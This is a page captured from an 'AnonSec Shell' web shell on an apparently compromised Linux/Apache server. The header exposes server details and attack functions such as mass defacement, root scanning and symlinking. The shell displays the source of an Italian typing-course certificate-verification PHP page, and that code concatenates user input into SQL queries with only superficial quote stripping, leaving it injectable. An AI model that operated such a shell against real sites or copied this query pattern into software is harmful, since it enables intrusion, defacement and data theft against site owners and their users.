. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.6.220   [ Reverse IP ]
Web Server : Apache/2.4.66 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-81.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/ascii/www_esami/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/ascii/www_esami/verifica-certificato.php
<?php

   $debug=false;
   //connessione piattaforma
   include "connection.php";
   if($debug){
      echo HOST.'-'.DATABASE."-".USER."-".PASSWORD;
   }
   /*//echo get_query_var('categoria')."----".$wp_query->get( 'pagename');die;
   $idcategoria_post = get_query_var('categoria');//$wp_query->get( 'categoria' );
   if( !isset($idcategoria_post) || empty($idcategoria_post) ) {
       $idcategoria_post = false; //default value
   }
   /*echo get_query_var('categoria')."------".$wp_query->get( 'categoria' );
   echo $idcategoria_post;*/

   /*$idcorso_post = get_query_var('corso');*/

   /*echo "<br><br>".get_query_var('corso')."------".$wp_query->get( 'corso' );*/
/*
   if( !isset($idcorso_post) || empty($idcorso_post) ) {
       $idcorso_post = false; //default value
   }*/


   //orderID
  $errore_orderid = false;
  $code = false;
  if($_GET['code']){
    $code = $_GET['code'];
  }
  if($_POST['code']){
    $code = $_POST['code'];
  }
  $code = str_replace('"', "", $code);
  $code = str_replace("'", "", $code);
  $code = str_replace("%", "", $code);
  

  if($code){ 
    $sql = "SELECT * from cliente WHERE dattilografia_success_code LIKE '".$code."'";
    foreach($db->query($sql) as $row) {$utente = $row;}
    if(count($utente)<1){
      $sql = "SELECT * from clientedelcentro WHERE dattilografia_success_code LIKE '".$code."'";
      foreach($db->query($sql) as $row) {$utente = $row;}
      if(count($utente)<1){
         $errore_orderid = true;
      }
    }
  }

  if($utente['idclientedelcentro']){
    $idcliente=$utente['idclientedelcentro'];
    $codice_centro= "ETC-".$utente['idcentro']."IT";  
    $nome_file_certificato= "certificato_".$codice_centro."_".$idcliente;
  }else{
    $codice_centro= "ETC-00001IT";
    $idcliente=$utente['idcliente'];
  }


?>




<!-- BLUCHIARO: #0364cc -->
<!-- BLUSCURO: background-color: #00264C; -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">

<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>


<style>
  .btn-submit{
    color: white !important;
    background: #0364cc !important;
  }
  .btn-submit:hover{
    color: white;
    background: #00264C !important;
  }

   .padding-10{
      padding: 10px;
   }
   .padding-10corsi{
      padding: 10px;
      padding-left: 20px; 
      padding-right: 20px; 
   }
   .light{
      width: 100%;
      padding: 10px;
      background: #0364cc;
      color: white;
      border-bottom: 15px solid #00264C;
   }
   .dark{
      width: 100%;  
      padding: 10px;
      background: #00264C;
      color: white;
      border-bottom: 15px solid #0364cc;
   }
   .dark a, .light a{
      color:white;
      font-size: 30px;
      font-weight: bold;
   }
   .dark a:hover, .light a:hover{
      color:white;
   }

   .light-corso{
      width: 100%;
      padding: 10px;
      background: #0364cc;
      color: white;
      border-bottom: 15px solid #00264C;
   }
   .dark-corso{
      width: 100%;  
      padding: 10px;
      background: #00264C;
      color: white;
      border-bottom: 15px solid #0364cc;
   }
   .dark-corso a, .light-corso a{
      color:white;
      font-size: 18px;
      font-weight: bold;
   }
   .dark-corso a:hover, .light-corso a:hover{
      color:white;
   }
   .tipologia-corso-div{
      margin-top: 6px;
      position: absolute;
      font-weight: 400;
      font-size: 13px;
   }

    .tipologia-categoria-div{
      margin-top: 6px;
      position: absolute;
      font-weight: 400;
      font-size: 13px;
   }
 

</style>
<section id="content" role="main" class="container">
   <div class="container">
      <div class="row">

      <div class="col-12">
         
                      <div class="light">
                            VERIFICA AUTENTICITA' CERTIFICATI
                              
                           </a>
                           <div class="tipologia-corso-div">
                            Puoi trovare il codice direttamente sul tuo certificato!
                           </div>
                        </div>
                   
                   <?php 
                          echo '<br><br>';
                          echo '<div class="col-md-12 padding-10" style="text-align: justify;">';
                          
                          echo "Gentile utente, inserisci qui il codice che trovi sul tuo certificato:</b></div>";

                          echo "<form method='post' style='width:100%'><div class='row'>";
                          echo '<div class="col-md-10 padding-10" style="text-align: justify;">';
                          echo "<input type='text' value='".$code."' name='code'></div>";
                          echo '<div class="col-md-2 padding-10" style="text-align: right;">';
                          echo "<input type='submit' class='btn-submit' value='VERIFICA'></div>";
                          echo '</div></form></div>';
                         if($errore_orderid){
                          echo '<br><br>';
                          echo '<div class="col-md-12 padding-10" style="text-align: center;">';
                          echo "<img  style='width:95px;' src='img/error.png'><h3>Gentile utente, ci dispiace ma non abbiamo trovato nessuna corrispondenza con il codice del certificato inserito. Verifica il codice inserito e riprova.</h3>";
                          echo '</div>';
                         }
                         if($code && !$errore_orderid){
                          echo '<div class="col-md-12 padding-10" style="text-align: center;">';
                          echo "<img style='width:95px;' src='img/trusted.jpg'><h3>Certificato Verificato con Successo!<h3><br><b><u style='color:darkgreen'>".strtoupper($utente['ragioneSociale'])."</u></b><br><br><b style='color:red'>ADDESTRAMENTO PROFESSIONALE PER LA DATTILOGRAFIA</b><br>Data Emissione: ".$utente['dattilografia_date_success']."<br>Centro ASCII: ".$codice_centro."</b>";
                          echo '</div>'; 

                         }?>



                   
               </div>
              
            
      </div>
   </div>
</section>

Anon7 - 2022
AnonSec Team